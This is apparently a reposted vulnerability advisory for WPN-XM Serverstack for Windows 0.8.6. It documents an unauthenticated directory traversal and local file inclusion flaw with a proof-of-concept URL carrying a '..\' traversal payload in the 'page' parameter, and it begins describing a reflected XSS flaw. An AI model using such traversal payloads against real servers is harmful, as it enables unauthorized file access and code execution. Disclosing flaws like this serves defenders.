Wpnxm serverstack for windows 0.8.6 multiple vulnerabilities Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-03-27 |
Type : webapps |
Platform : php
This exploit / vulnerability Wpnxm serverstack for windows 0.8.6 multiple vulnerabilities is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-02-13
# Vendor Homepage: http://wpn-xm.org/
# Software Link : https://github.com/WPN-XM/WPN-XM/
# Tested Version: 0.8.6
# Tested on: Windows 10 using XAMPP
Vulnerability description: WPN-XM Serverstack for Windows v0.8.6 allows
unauthenticated directory traversal and Local File Inclusion through the
parameter in an /tools/webinterface/index.php?page=..\..\..\..\..\..\hello
(without php) GET request.
Proof of concept:
To detect: http://localhost/tools/webinterface/index.php?page=)
The parameter "page" can be modified and load a php file in the server.
Example, In C:\:hello.php with this content:
C:\>type hello.php
<?php
echo "HELLO FROM C:\\hello.php";
?>
To Get hello.php in c:\ :
http://localhost/tools/webinterface/index.php?page=..\..\..\..\..\..\hello
Note: hello without ".php".
And you can see the PHP message into the browser at the start.
<title>WP?-XM Server Stack for Windows - 0.8.6</title>
<meta name="description" content="WP?-XM Server Stack for Windows -
Webinterface.">
<meta name="author" content="Jens-André Koch" />
<link rel="shortcut icon" href="favicon.ico" />
Vulnerability description: WPN-XM Serverstack for Windows v0.8.6, does not
sufficiently encode user-controlled inputs, resulting in a reflected
Cross-Site Scripting (XSS) vulnerability via the
/tools/webinterface/index.php, in multiple parameters.